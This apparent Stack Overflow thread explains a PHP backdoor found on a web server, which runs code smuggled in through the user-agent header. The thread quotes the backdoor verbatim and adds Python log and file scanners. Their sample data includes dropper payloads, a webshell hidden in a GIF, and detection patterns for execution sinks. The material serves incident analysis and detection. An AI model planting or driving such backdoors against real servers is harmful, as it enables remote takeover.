
I'm searching for your help today to get some help about a file I found on my FTP this morning. I'm not a professional in all those PHP functions, so this is why I post it here.

The thing I found was a file named index.php in a sub-images folder.

Here is the raw code:

<?php

if (eregi("final",$_SERVER['HTTP_USER_AGENT'])) { eval(str_replace('Mozilla/5.0 (3.1.final) ','',$_SERVER['HTTP_USER_AGENT'])); die; }

?>

The two PHP functions

For the function eval(), they say that it is very dangerous.

Caution: The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.

This is why I think it might be an attempt from someone to hack my website or even more.

Anyone has the capability to decode this and explain it to me?

Thx,

Patrice Poliquin
    Sidenote: `eregi` is an old deprecated function which has been replaced by `preg_match()`. If you didn't put it there, then yeah, you've been hacked. – Funk Forty Niner Oct 30 '14 at 14:21
  • 1
    `hackage` is the correct tag :? – ʰᵈˑ Oct 30 '14 at 14:24
  • 1
    As @Fred-ii- stated, if you found this piece of code in a file on your server and you did not put it there, then someone has access to your server as well. I'd recommend changing your password immediately – chriz Oct 30 '14 at 14:26
  • 1
    eval on `$_SERVER['HTTP_USER_AGENT']`? Yeah, it's utterly ludicrously dangerously stupid code. If you didn't write this, then you should consider your server toxic waste and act accordingly. If you did, then you really need to learn how to code securely. – Marc B Oct 30 '14 at 14:40
  • 1
    Sidenote: This may have been caused by using some form of CMS such as WordPress, Joomla etc. with an outdated/insecure plugin. Or, someone accessed your site via another backdoor which may have been your web host service's fault; I've seen that happen before. As already mentioned, change your password right away and to a much stronger one, not using common readable words. – Funk Forty Niner Oct 30 '14 at 14:48

2 Answers


Yes, it's a simple eval backdoor, installed so that someone can come back at any time later and use your server for anything nefarious that they want to.

It accepts a user agent string starting with Mozilla/5.0 (3.1.final) (which is not a real user agent string), and treats the rest of the string as PHP code, which is executed via the eval call.

(The strange part is that they used the user agent for this, since that field is routinely logged in standard web logs. Using a POST field or cookie would be much more covert.)

Boann
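Because the trigger lives in the User-Agent header, every use of this backdoor is sitting in the access log, as the answer above points out. The following is an added example and not part of Boann's answer: a Python script that reproduces the backdoor's decision logic (the case-insensitive "final" test and the prefix strip) without ever calling eval, and runs it over Apache/nginx combined-format access log lines to list which requests reached the eval and what string was executed. The log lines are constructed for the demo, and the "combined" log format is an assumption; adjust LOG_RE if your server logs differently.

```python
import re
import sys
from dataclasses import dataclass

# The backdoor's two constants, copied from the file in the question.
TRIGGER = "final"                    # eregi("final", ...) is a case-insensitive substring test
PREFIX = "Mozilla/5.0 (3.1.final) "  # str_replace() removes exactly this, trailing space included

# Apache/nginx "combined" format (assumed). Quoted fields may contain escaped
# quotes, so each one is matched as (?:[^"\\]|\\.)* rather than [^"]*.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<req>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"'
)
# Apache writes " and \ as \" and \\ ; nginx writes " as \x22. Other escapes are left alone.
ESC_RE = re.compile(r'\\(x[0-9A-Fa-f]{2}|["\\])')


def unescape(field):
    return ESC_RE.sub(
        lambda m: chr(int(m.group(1)[1:], 16)) if m.group(1)[0] == "x" else m.group(1),
        field,
    )


@dataclass
class Hit:
    ip: str
    ts: str
    request: str
    user_agent: str
    payload: str  # the exact string eval() was handed


def backdoor_payload(user_agent):
    """Re-run the backdoor's decision logic without eval().

    Returns what eval() would have received, or None if the request would
    never have reached it. eregi() is case-insensitive, so an agent such as
    "FinalCrawler" also reaches eval(); the prefix is simply not stripped and
    eval() fails to parse the string, so the script dies without running code.
    """
    if TRIGGER not in user_agent.lower():
        return None
    return user_agent.replace(PREFIX, "")


def scan_log(lines):
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        ua = unescape(m.group("ua"))
        payload = backdoor_payload(ua)
        if payload is not None:
            hits.append(Hit(m.group("ip"), m.group("ts"), unescape(m.group("req")), ua, payload))
    return hits


# Constructed sample lines (not from the poster's server): one normal browser,
# two requests driving the backdoor, and one crawler that merely contains "Final".
SAMPLE_LOG = [
    '198.51.100.7 - - [30/Oct/2014:09:12:01 -0400] "GET /index.php HTTP/1.1" 200 5120 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"',
    '203.0.113.5 - - [30/Oct/2014:03:41:17 -0400] "GET /images/index.php HTTP/1.1" 200 38 "-" '
    '"Mozilla/5.0 (3.1.final) system(\'id\');"',
    '203.0.113.5 - - [30/Oct/2014:03:41:19 -0400] "POST /images/index.php HTTP/1.1" 200 0 "-" '
    '"Mozilla/5.0 (3.1.final) file_put_contents(\\"/var/www/html/.cache.php\\", base64_decode($_POST[\'d\']));"',
    '192.0.2.44 - - [30/Oct/2014:11:02:55 -0400] "GET /index.php HTTP/1.1" 200 0 "-" '
    '"Mozilla/5.0 (compatible; FinalCrawler/1.0)"',
]

if __name__ == "__main__":
    # Pipe a real log on stdin; with no stdin the constructed sample is used.
    lines = SAMPLE_LOG if sys.stdin.isatty() else sys.stdin
    for h in scan_log(lines):
        print(f"{h.ts} {h.ip} {h.request!r}\n    eval'd: {h.payload}")
```

Run it as `zcat -f access.log* | python3 scan_ua_backdoor.py` to see every source address that used the shell and the PHP each request executed; the third sample hit shows why this matters, since a payload that drops a second file means removing index.php alone is not enough.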

Let's start from the beginning.

  • eregi is a deprecated function as of PHP 5.3.0.
  • eregi is a case insensitive regular expression.

So, what's it doing?

if (eregi("final",$_SERVER['HTTP_USER_AGENT'])) {

If final is in the HTTP_USER_AGENT, then....

Replace 'Mozilla/5.0 (3.1.final) ' with [blank] in the HTTP_USER_AGENT. And kill the script.

Conclusion

It's ineffective in terms of altering data on your site, but will render your site "dead" to anybody with the word final in their user agent - which, I think, will be all final version released of every major browser; although I cannot find any source on this.

Edit

The eval got me wondering. Since it's evident you didn't put it here, eval will evaluate code and execute it - which is a concern of an attack. The only way for somebody to get remote code to execute on your site is to "spoof" their user agent ensuring they have the phrase Mozilla/5.0 (3.1.final) in there followed by all the code they want executing. For example;

I spoof my user agent to become

Mozilla/5.0 (3.1.final)  echo 'Lol, you got hacked'

Because of the str_replace, the screen will just render the words Lol, you got hacked because eval will execute the echo. Of course, an attacker will put much more harmful commands to be evaluated. Remove this code immediately.

ʰᵈˑ
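Finding this one file does not mean it is the only one: as the comments above note, whoever wrote it had write access to the server. The following is an added example and not part of the answer above: a Python scanner that walks a web root and flags PHP lines where a code- or command-execution sink (eval, assert, system, ...) is fed request data, which is the exact shape the answer walks through, plus the decoder-wrapped variant (eval of base64_decode/gzinflate output) and PHP code hiding in files with non-PHP names such as the images folder this one turned up in. The only sample that is the thread's own code is the backdoor itself; the neighbouring files, the severity labels and the directory layout are constructed for the demo, and the check is a line-based first pass, not a proof that a tree is clean.

```python
import os
import re
import sys
import tempfile

# Constructs that turn a string into code or a shell command. assert() evaluated
# string arguments in PHP 5, which is why it sits here next to eval().
SINK_RE = re.compile(
    r'\b(eval|assert|create_function|system|passthru|shell_exec|exec|popen|proc_open)\s*\(',
    re.IGNORECASE)
# Request-controlled input. $_SERVER is included because request headers land
# there, which is exactly how the HTTP_USER_AGENT backdoor in this thread is driven.
SOURCE_RE = re.compile(r'\$_(GET|POST|COOKIE|REQUEST|SERVER|FILES)\b|php://input|\bgetenv\s*\(',
                       re.IGNORECASE)
# Decoders typically wrapped around a payload to keep it out of grep's sight.
DECODER_RE = re.compile(r'\b(base64_decode|gzinflate|gzuncompress|str_rot13|strrev|hex2bin)\s*\(',
                        re.IGNORECASE)
PHP_EXTS = (".php", ".phtml", ".php3", ".php4", ".php5", ".phps", ".inc")


def scan_source(text):
    """Line-oriented heuristic: returns [(line_no, severity, stripped_line)].

    It misses shells that build function names at runtime or split the sink
    and its argument across lines; treat it as a first pass.
    """
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not SINK_RE.search(line):
            continue
        if SOURCE_RE.search(line):
            sev = "high"      # request data flows straight into the sink
        elif DECODER_RE.search(line):
            sev = "medium"    # sink fed by a decoder: the classic obfuscated-shell shape
        else:
            sev = "review"    # sink present; trace where its argument comes from
        findings.append((n, sev, line.strip()))
    return findings


def scan_tree(root):
    """Walk a web root; returns {path: findings} for files with at least one finding."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                content = fh.read()
            findings = []
            if not name.lower().endswith(PHP_EXTS):
                # The thread's file sat in an images folder; PHP inside a .gif/.jpg
                # (or any non-PHP name) under the web root deserves a look on its own.
                if "<?php" in content or "<?=" in content:
                    findings.append((0, "high", f"PHP open tag in non-PHP file ({name})"))
                else:
                    continue
            findings += scan_source(content)
            if findings:
                results[path] = findings
    return results


# The file from the question, verbatim.
BACKDOOR_SOURCE = """<?php

if (eregi("final",$_SERVER['HTTP_USER_AGENT'])) { eval(str_replace('Mozilla/5.0 (3.1.final) ','',$_SERVER['HTTP_USER_AGENT'])); die; }

?>
"""

# Constructed neighbours for the demo (not from the poster's server).
SAMPLE_FILES = {
    "images/index.php": BACKDOOR_SOURCE,
    "uploads/logo.gif": "GIF89a\n<?php eval($_POST['c']); ?>\n",
    "cache/loader.php": "<?php\n$blob = file_get_contents(__DIR__ . '/data.bin');\neval(gzinflate(base64_decode($blob)));\n",
    "lib/config.php": "<?php\n$cached = cache_get('config');\neval('return ' . $cached . ';');\n",
    "search.php": "<?php\necho htmlspecialchars($_GET['q'], ENT_QUOTES, 'UTF-8');\n",
}


def demo():
    """Write the samples into a temporary web root, scan it, return findings keyed by relative path."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLE_FILES.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(content)
        found = scan_tree(root)
        return {os.path.relpath(p, root).replace(os.sep, "/"): f for p, f in found.items()}


if __name__ == "__main__":
    # Pass a web root to scan it; with no argument the constructed demo tree is used.
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for path, findings in sorted(results.items()):
        for line_no, sev, snippet in findings:
            print(f"{sev:6} {path}:{line_no}  {snippet}")
```

In the demo the backdoor and the PHP-in-a-GIF both come out "high", the gzinflate loader "medium" and the config cache "review"; the search page, which touches $_GET but never a sink, is not reported. Anything marked "high" that you did not write yourself should be treated the way the comments above suggest: the whole host is compromised, not just that file.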